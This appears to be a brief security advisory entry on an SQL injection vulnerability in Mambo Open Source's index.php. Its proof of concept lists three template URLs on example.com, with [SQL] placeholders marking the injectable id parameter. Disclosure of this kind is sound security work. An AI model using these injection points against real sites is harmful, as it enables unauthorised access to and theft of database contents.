• info
• discussion
• exploit
• solution
• references

Mambo Open Source Index.PHP SQL Injection Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/index.php?option=content&task=view&id=[SQL]&Itemid=[VID]
http://www.example.com/index.php?option=content&task=category&sectionid=[VID]&id=[SQL]&Itemid=[VID]
http://www.example.com/index.php?option=content&task=category&sectionid=[VID]&id=[SQL]&Itemid=[VID]